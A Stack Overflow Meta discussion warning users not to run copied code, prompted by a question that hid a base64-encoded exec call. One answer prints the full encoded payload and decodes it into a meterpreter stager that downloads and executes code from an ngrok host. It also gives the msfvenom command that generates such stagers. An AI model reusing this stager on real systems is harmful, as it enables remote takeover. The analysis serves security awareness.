# Blindly Copy-Pasting Code is BAD: A Gentle Reminder!

Tags: discussion, security, psa

A friendly reminder to all those who need it:

#### Executing code you found online is BAD!!<sup>*</sup>

Once more for the people in the back:

### Executing code you found online is BAD!!<sup>!!!<sup>*</sup></sup>

There's a great [post on the Stack Overflow blog](https://stackoverflow.blog/2020/05/20/good-coders-borrow-great-coders-steal/) about why you shouldn't clone code from the internet into your projects, but this advice applies *even if you're just copying someone's code to answer their question!*

Here's an example:

This question appeared on Stack Overflow tonight: [My python project is closing when i run it [closed]](https://stackoverflow.com/q/67223512/843953)<sup>The question has since been deleted<sup>Thanks mods!</sup></sup>

The question claimed that OP's Python project wouldn't open, and gave some code.

```python
print("Connected server!")
exec(_import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('<some very BAD payload>')[0]))
```

And then some images of a couple windows.

`exec`? Huh, fishy! Trying to execute a base64-encoded string? Something *really smells here!*

The decoded base64 string contained code to connect to a server, download *yet another* payload, and `exec` that. I'm not brave enough to download that can of worms.

The question in question was promptly edited to hide the malware and closed, so no harm done, but this serves as a great example of why you should never, *ever* execute code you found online without first understanding what it does -- *even* if you found it on Stack Overflow!

While I understand that this is common sense and that people should know to treat code they find online with a healthy dose of mistrust, can we add a warning to the FAQ or somewhere that makes this danger clear to people?
Can we do more than simply posting a warning to not blindly copy paste code that nobody will read or remember?

<sup>* Without first understanding what it does</sup>

Comment: related https://meta.stackoverflow.com/questions/267708/are-there-security-concerns-with-code-posted-to-stack-overflow and https://meta.stackoverflow.com/questions/287327/how-can-we-discuss-malicious-code

Comment: We could all use a PSA every now and then.

Comment: Anyway, that question was tagged [metasploit], whose wiki says that [questions about *using* the framework are off-topic for SO](https://stackoverflow.com/tags/metasploit/info). I'm not entirely sure SO is a great place for asking questions about its development, given that GitHub Issues exists.

Comment: soooo, can you at least pretend to ask a question? :) Not sure whether the post fits in its current version - and something tells me the situation will turn into a hot mess once the post gets more exposure.

Comment: @PranavHosangadi - hope it won't blow up too :) As a note, this could be turned into a FAQ item for answerers to not execute the code from askers unless they are sure they can provide a secure environment (if we don't have that notice already that is).

Comment: Also see [Good coders borrow, great coders steal](https://stackoverflow.blog/2020/05/20/good-coders-borrow-great-coders-steal/)

Comment: This talks about malicious codes in an answer (not in a question), but I think the guidance/discussions there applies here as well: [Posting malicious code as an answer](https://meta.stackoverflow.com/q/318722/2745495)

Comment: Yeah... it's pretty much a given. Driving blindly? Bad idea. Crossing the street blindly? Bad idea. I would more say: be aware of what "bad code" looks like. There are actually interesting youtube channels which dive into the workings of malware. Here is [an episode](https://www.youtube.com/watch?v=3Q9-X_NRlJc) which investigates a VBScript case which does very similar "decode really obfuscated junk and run" tricks.

Comment: Note that even code that does not look bad at first sight can still be malicious. Unless you understand every line there is a risk, especially if you are a beginner

Comment: It's common for maintainers of open source projects often have some simple (e.g. grep-like) checks for primitive signs of misbehaviour (e.g. 'exec' would be treated with suspicion). I wonder if a SO could grep questions and place them in a priority review queue?

Comment: "much less pretend I can worm a question into this" Why can't you worm a question into this? It's so easy. Just ask "Why is it bad to blindly copy paste code..." You just pasted the answer first, but there is always a question. Another interesting question might be: Can we do more than simply posting a warning to not blindly copy paste code...? There is a unfriendly comments robot. Maybe a malicious code robot could be trained too. exec and base64 sound like they could be keywords.

Comment: For example [this question](https://stackoverflow.com/questions/55580305/python-exec-not-working-when-code-gets-compiled-with-pyinstaller) question looks similar to the example here but is harmless. Maybe a warning could popup whenever people use exec or encoded stuff in their questions or answers. I imagine some warning signs (potential security vulnerability) and maybe even a special review queue for it. That could also be extended to other known bad things.

Comment: @Trilarion - this actually looks like a great SOBotics idea (there is no bot covering malicious code, right? I can't recall any). Detecting simple cases like `exec(base64.b64decode("<encoded payload here>")` looks fairly trivial. Not sure about the review queue, maybe just autoposts in SOCVR

Comment: `feature-request` Add a warning banner on registration to the site: *"__WARNING!__ copy-pasting code from SO is done on your own risk. Make sure you understand what it does before running it. SO will not hold responsible for any lost data or damaged hardware"*

Comment: @Tomerikoo - won't do, by the time they post a question or answer, this warning will not be present even in the back of their mind :) But a nice idea nonetheless: how about showing the warning on copy from a code block (since SE did a great job at laying the foundation of copy tracking on April Fool's this year) if the copied content contains signs of malicious intent (like `exec(<insert whatever>)`)?

Comment: @PranavHosangadi - btw, glad to see the post in good health after getting up :) This is quite an important topic.

Comment: @BoltClock maybe swapping out a featured post? Other sites do these PSA regularly where these questions are featured every other day.

Comment: To be fair, I'm glad this was said.  With all the flurry around the clickbait headlines of "25% of SO users copy/paste code!", everyone should be reminded that copy/paste is not without context.

Comment: While I applaud the effort, I strongly doubt that users who would blindly copy-paste that, actually read Meta...

Comment: @Trilarion because my brain had stopped working! I added a question now, thanks for your suggestion :)

Comment: Wow. And after all those lectures and all those movies...

Comment: The referenced blog post is not "about why you shouldn't clone code from the internet into your projects" as OP claims. It offers various reasons for and against various kinds of reuse. Overall the threat level here is really low, not warranting so many headlines and exclamation marks.

Comment: @stevec it wouldn't be hard to obfuscate the bad code so it would pass a simple grep filter.

Comment: [A fresh new example](https://stackoverflow.com/q/67251169/6045800)

Comment: @Gimby I wouldn't say it's a "given" considering that the SO podcast just ran an episode celebrating precisely the joys of dropping arbitrary code from SO (and elsewhere) into your work. You and I might assume that nobody would run code that they don't understand, but apparently SO's business model is based on the opposite assumption.

Comment: I don't know. If you try to explicitly say EVERY OBVIOUS THING, you end with a massive list of completely obvious stuff that NOBODY WILL EVER READ. Like when you buy a TV set and there's a "safety booklet" that tells you not to run it in the bathtub, not to drop it on your foot, etc. I throw those away without looking at them - I think most people do. Better to focus on the non-obvious things - at some point "you can't fix stupid".

Comment: Here's a rather bizarre case of someone copying & using code they didn't fully understand having a negative impact on the original author of the code. https://stackoverflow.com/q/48610180/4014959 I suspect it wasn't great for the career of the person who did the copying either... ;)

Answer (score 59, accepted):

We should totally add a warning popup that appears whenever someone is copying code. You know, like this:
[image]

The <kbd>Learn more</kbd> button should link to [this meta thread](https://meta.stackoverflow.com/q/407049/1048572), or the [blog post](https://stackoverflow.blog/2019/11/26/copying-code-from-stack-overflow-you-might-be-spreading-security-vulnerabilities/). You may dismiss the popup for a few number of copies, by clicking <kbd>Thanks for the warning, I understand the risks</kbd>, but it should come back from time to time - at least every 1st of April.

Comment: If only I could simultaneously upvote and downvote this, to accurately represent the range of feelings it elicits within my soul. You wonderful monster you.

Comment: Normally I would separate images as large (or rather, hi-res) as this from paragraphs of text, but the way this particular image has been laid inline causing that widow-esque effect has a certain artistic quality to it that I wouldn't change. (In fewer, simpler words: shitposting is an art.)

Comment: @BoltClock I got to admit it's the first screenshot I found (not my own), and it's too large in my eyes, but I didn't bother to manipulate it

Comment: It's hilarious, nobody touch it.

Answer (score 25):

I think the comments on the questions should be addressed:

> This is malware. You can go take a flying leap.

> This is trolling.

Malware: yes, this would probably qualify as malicious software. Abuse of the OP wasn't called for though. Yes, they could have made it clearer that it has the potential to lead to an infection, but this could have very-well been a legitimate question. I've used this payload before for homework (if not exact, a very similar one). I don't think the assumptions of intent were fair.

---

Also, for the sake of analysis, the actual script can be fairly easily viewed by replacing the call to `exec` with `print`, and `decode`ing it so it displays nicely:

```py
print(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzgudGNwLm5ncm9rLmlvJywxNjAwNSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]).decode("UTF-8"))
```

Produces:

```py
import socket,zlib,base64,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(("<removed>",16005))  # See below. Removed for security
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
```

So, it opens a socket to `'8.tcp.ngrok.io':16005` (IP removed from above to make it more difficult to accidentally execute), receives the number of bytes to download, receives that many bytes, then `exec`utes the final value of `d`.

This would be a payload stager, and given the initial question mentions "metasploit", it's likely a [meterpreter shell](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/) stager. This code alone would be completely safe to run without a network connection or with an invalid IP/port combo, since it doesn't establish any kind of persistence on its own. Once the connection is established to the remote server however, an attacker could use the sessions to gain persistence (starting a payload every time your computer boots for example), or carry out a number of other exploits. If a connection were to be established, you should consider that machine and anything else on the network potentially compromised.

This analysis "technique" can be used for any other kinds of similar encoded code. As long as there isn't an exploitable vulnerability in the decoder that is taken advantage of, it's safe to decode. If you want to be extra careful though, you can use a Virtual Machine without a network adapter, take a snapshot of it, and try it out.

---

This is in fact a meterpreter stager. I can recreate the code by simply running:

```sh
msfvenom -p python/meterpreter/reverse_tcp
```

(Although, that doesn't specify the host or port to use).

Comment: Not an expert in this area, but since it downloads and executes code from somewhere, is it possible that the downloaded content get's changed? That it downloads something harmless today, but a virus tomorrow?

Comment: @BDL This code alone simply downloads and executes whatever it's given, so yes, whatever the server gives at the time of connection will be executed on the victim machine, and that downloaded code could change at any point. If the point of the stager is to download a meterpreter shell, that likely wouldn't change, but once the connection is established, the attacker could do whatever they want. When I said that it's "completely safe", I meant provided you don't allow a connection to be established. If it does connect, you should consider you machine compromised.

Comment: What if I ran the original code in a Virtual Machine *with* network access? Will it affect my main machine? (I kinda wanna try it)

Comment: @Yatin That depends entirely on the payload that it downloads, or what an attacker downloads via the shell after establishing a connection. If the payload is capable of finding other machines on your network, or allows an attacker to search your network, and they're able to make their way into another machine via an exploit or something, yes, it could affect any other machines on the network. It's also theoretically possible that the downloaded payload could be meant to break containment of the VM, but those are rare exploits afaik.

Comment: In the light of day, I agree that assumptions of intent were unfair, but you really can't get mad if people react strongly to you brandishing a gun, even when said gun is unloaded!

Comment: @PranavHosangadi That's a fair comparison. I agree with censoring the code/placing a warning, since the code *could* have been posted for malicious reasons under the pretext of wanting help. I just think the interaction with the OP could have gone better.

Comment: @Yatin If you want to try it safely, I showed how you can create your own version of this using `msfvenom`. By default, it uses your local IP and port 4444. To play the role of the attacker, you'd need the Metasploit framework (`msfconsole` specifically), and the handler `exploit/multi/handler` which allows for receiving remote connections. The code is produces, and the meterpreter session that's started isn't inherently harmful, so unless you execute something malicious yourself, it's safe.

Comment: Given your knowledge of the code, could the comment at the end of the question (translated from Turkish) "I tried to open format but it doesn't work because it turns off by itself" be referring to trying to format a disk drive?

Comment: @AndrewMorton This code doesn't do any formatting of hard drives (although, if an attacker used this code to establish a connection and managed to escalate their privileges, they could format your hard drive manually). Reading over their comment, I believe they mean that when they execute the code in a different format (`exe` vs `py`), it doesn't work.

Comment: In my defense, it did like the OP was trying to manipulate us into helping them create and spread malware (which is why I thought that we were being trolled). I will freely admit that I may have overreacted, though.

Comment: Isn't this missing the point of the question? _You_ might be able to decode this but there's no way I would have known this. I personally wouldn't have executed it, but there's no flag for "major security issue potential" other than a mod flag. The question then is, do we rely on the knowledge of moderators vs. knowledgeable people that could flag it? In other words, the flag might reasonably be declined because the mod doesn't know how to investigate fully and it's potentially a fair question on the surface

Comment: The more I think about this, the worse it gets. I don't know how my imagined system works :'( I can't think of a good way to remove genuine cases of abuse if they're presented in this format

Comment: @roganjosh maybe a good middle ground is to add a mod action to include an uneditable warning in the start of the question that reads like "this question contains code that could potentially harm your computer if executed"?

Comment: @PranavHosangadi - eh, this will likely lead to good-willing questions downvoted and ridiculed even more than in this case - a safer solution is to show it upon copy - which is fairly trivial to track nowadays.

Comment: Could someone explain to me in which context this payload would be part of homework? Security?

Comment: @LeifWillerts Yes, information security. The main reason I answered this question was, the entire previous day, I had been doing malware analysis for an assignment, and a few hours after I wrote this answer, I had a practical exam where I needed to carry out attacks against a few computers using the Metasploit Framework. Assignments using tools like this are very common; at least in the program I'm in.

Answer (score 6):

I get it and agree that base64 strings are apparently [all the rave](https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc) when it comes to being able to sneak in malicious content and malicious behavior.  Seeing a base64 string is just...well, it's easy to ignore because it's not clear what it does.

I also get that there's this heightened awareness and concern over someone compromising your system, and this seems like a fairly straightforward way to accomplish it.

The problems that I have with this are multiple:

1. [**It is not against any rules to post questions in pertaining to code that can be used for viruses or other nefarious purposes.**](https://meta.stackoverflow.com/q/262656/1079354)  You may not *like* it, but that does not mean that it is OK then to flame or brigade anyone that asks this in good faith.
2. Copying and pasting any code without understanding what it does has ***always*** been a bad idea.  If you don't understand it, then don't run it!
3. **There were too many enthusiasts, and not nearly enough *experts* trying to tackle this question.**  [This Meta response makes that clear](https://meta.stackoverflow.com/a/407065/1079354) that this was something to do with Metasploit, which is still valid to ask about (people could ask on-topic questions about this).  The overreaction from the enthusiasts on this being absolutely and certainly malware was...well, an overreaction, in my mind.

Overall I agree with the thrust of this discussion and PSA, but I can say that I'm somewhat disappointed with the overreaction.

Comment: The alarm wasn't because of the b64-encoded string. It was because of what _that script did_ -- which is download another script to execute, and that is very suspicious behavior. This meta "question" was originally intended as a PSA to reiterate and reinforce your point #2. I only added the weak questions because it was in danger of being closed as "not a question". Of course you can't legislate for stupid, and you're supposed to know not to do this, just like you're supposed to know to look both ways before crossing the street.

Comment: I personally think that the same response would've come up if the code *weren't* base-64 encoded.  I still feel like my points are apt in that the overreaction towards this code being potentially malicious (and thus somehow off-topic) are relevant, as well as the fact that we could've all used an expert to weigh in at the right time to either explain why this question wasn't harmless or why it was.  Point 2 is an unspoken rule, just like crossing the street; if you *don't* check both ways before crossing, then there's really no helping you before someone comes speeding through.

Comment: But you _do_ tell children that they should look both ways, don't you? In this case, the target audience would be new SO users who are just beginning programming, or new to answering questions who'd trust and execute code found on SO. If you know better than to do that, more power to you!

Comment: Anyway -- analysis by Carcigenicate shows that the script encoded in b64 was not malicious but they made no claims about the safety of the script that would have been downloaded from `8.tcp.ngrok.io`. OP included no details in the SO question warning that this download and exec would happen, or telling people what the downloaded scripts would do, so I don't think it's an overreaction. A more detailed question with warnings about what the script does wouldn't have elicited the same "overreaction"

Comment: Hell, I'm not even an enthusiast let alone an expert, all I had to do was notice the metasploit tag in order to realize there was more to the question than meets the eye. (At least, notwithstanding the unrelated user moderation issues [Machavity mentioned later](https://meta.stackoverflow.com/questions/407110/should-questions-about-obfuscated-code-be-off-topic).)

Comment: Well @BoltClock, I can't really stick my nose into their moderation issues, now can I? For the most part I'm just lookin' at the question as neutrally as I can.

Comment: @PranavHosangadi:  A reasonable, sensible, level-headed comment on the question would've been, "Why is this payload encoded in base64?"  For those who deobfuscated it, a perfectly reasonable follow-up would be, "What is this site, and is it safe to actually execute this code which reaches to it?  Could you make it so that the problem is essentially the same without a mysterious/dubious address?"  Instead we saw people make inflammatory comments about the OP's character or what the OP could do with themselves.  *That's* the real pity.

Comment: I agree that abuse of OP was an overreaction and uncalled for. For that, I am sorry (and others who posted similar comments have apologized since too).

Comment: Although it's worth keeping in mind that as [Machavity found the same user posting the same code with no detail but in PowerShell later](https://meta.stackoverflow.com/questions/407110/should-questions-about-obfuscated-code-be-off-topic), so the overreaction in this case was warranted. I expect legitimate questions about malware usually come from users who are aware of the harm such malware can cause and are therefore very careful to let other people know what they're asking about.

Comment: @PranavHosangadi Or they read this post and found that the reaction wasn't warranted and hoped to gain a better response on the second try..?

Comment: Yeah @PranavHosangadi, I have to agree with Scratte on this one.  Assuming good faith, users *always* repost their closed questions. It's a pattern.  So, it's likely that someone got their question closed for reasons they disagreed with and decided to repost it instead, which is still *bad*, but not *nefarious*.

Comment: @Pranav Hosangadi: "got a bit more decisive response because of the unrelated moderation issue they chose to ignore" That subsequent post has nothing to do with the reaction to the one we're discussing here.

Comment: @BoltClock Are we calling "abuse of OP" an overreaction, or are we saying it was an overreaction to edit / close their question? If it's the former, I absolutely agree. If it's the latter, OP seems to show a pattern of posting unmarked base64-encoded code wrapped in an exec (either Powershell or python) even though they were told by Makyen why there was a strong reaction to their original post. We can debate OP's intent till the cows come home, but I don't believe editing out their b64 in the absence of any explanation from OP was an overreaction, especially in the light of repeat behavior.

Comment: @Pranav Hosangadi: Just the abusive comments. I'm not debating the OP's intent though. I'm telling you as a mod that their reposted question is between us and them, and has nothing to do with the one this is discussing. (That's why I said "notwithstanding" in my initial comment to Makoto, because while they did repost, it's irrelevant to this discussion.)

Answer (score -9):

### Detecting When Code is Selected

Ideally, there should be a system in the background that runs some sort of scan, as soon as a piece of code is selected in the browser.

Finding out whether a piece of code is selected (about to be `Cmd/Ctrl+C`ed) can be done via https://developer.mozilla.org/en-US/docs/Web/API/Window/getSelection as soon as a mouse click occurs.

### Notifying User

Now, if the selected code is from an answer that doesn't have enough **code-reputation**, it should warn the user with:

- ***Copy/pasting blindly is bad. This answer might harm you and your system.  If you don't understand what it's doing, assume that it can be malicious.***

### Code-Reputation

Now, the question is, how to compute/add "reputation" to a code.

I was thinking the number of answer's upvotes (or whether or not a high-rep user has upvoted this answer)  can help. But in a systematic attack, the bad actor might upvote the answers with a bunch of fake accounts.  It's a good method for the beginning but ideally, it can be its own verification badge.

---

### PS. before you vote negative!

1. It doesn't need to be intrusive or blocker.  Just a dismissible small notification on a corner that can be easily ignored.
2. It can have an option of "**Don't show this ever again**" if the user is pro and already knows this.
3. I am under the impression that the whole point of this *Meta* question is to teach this culture of **DON'T BLINDLY COPY/PASTE** to **novice users**.  So if you think it doesn't deliver on that promise, I'd be happy to hear your opinion.  However, if you are not in this subject group, you won't be harmed. :)

Comment: I used to run the code of all the Answers that I reviewed. I'm pretty sure none of them had any code-reputation to speak of. I'd end up uBlocking the alert. To be honest, I think Stack is the site where I uBlock most stuff.

Comment: Can't say that I care when someone copies code.  At that point, they've assumed full responsibility as to what goes into their clipboard.

Comment: @makoto and Scratte:  Thanks for your feedback. I just added a "PS." section to address your concerns.

Comment: Don't pay too much attention to the score on your post. It's just a signal that others don't agree with you. On meta getting downvotes doesn't mean your post is bad (it can mean that too, but probably not the case here :-)